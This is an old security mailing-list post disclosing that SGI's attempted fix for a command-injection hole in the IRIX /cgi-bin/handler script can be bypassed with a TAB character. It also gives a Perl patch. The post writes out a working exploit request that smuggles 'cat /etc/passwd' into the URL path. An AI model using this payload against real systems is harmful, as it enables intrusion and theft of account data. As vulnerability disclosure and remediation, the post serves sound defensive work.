/cgi-bin/handler - more notes

[drazvan () kappa ro (Razvan Dragomirescu)]

Hi,

I have had reports that my exploit for SGI's /cgi-bin/handler does not
work on IRIX 6.3 (on O2).  I analyzed the code provided with IRIX
6.3 and they tried to fix it, but they actually DID NOT.

They added a new line to the script:

$doc=~s/\|*$// (in plain English, this means "remove any number of '|'s at
end-of-string"). But guess what. It works just as fine if you put another
TAB character after the "pipe" (so that the "pipe" is not at
end-of-string, the TAB is).

The exploit should read

telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat       /etc/passwd|    ?data=Download
HTTP/1.0

It tricks the script into executing the command anyway.
Now, for those of you who want to patch it somehow, here's the best
solution that has been posted to me (all credits for it go to Wolfram
Schneider <wosch () apfel de>)

All "open" commands should check if the their argument is really a
filename. You could use:

-f $doc && open (INPUT, $doc)

(Same thing as: if (-f $doc) {open (INPUT, $doc) } , the one written
above is more PERL style)

I'm waiting to hear from you (my thanks to Lamont Grandquist who pointed
out the problem on IRIX 6.3).

So far, IRIX versions 5.3, 6.2, and now 6.3 are vulnerable.
Anyone on IRIX 6.4? :) (What does it run on BTW?)

Be good.
Razvan
-------------------------------------------------------------------------------
RazvanDragomirescu Organization: KappaNet E-Mail: drazvan () kappa ro,
drazvan () romania ro Alternate E-mail: drazvan () iname com, drazvan () guv ro,
drazvan () pub ro, drazvan () lbi ro Phone: +40-1-6866621 NIC-HANDLE: RD1604
RIPE-HANDLE: RD38-RIPE
NO CARRIER

"Smile, tomorrow will be worse" (Murphy)
-------------------------------------------------------------------------------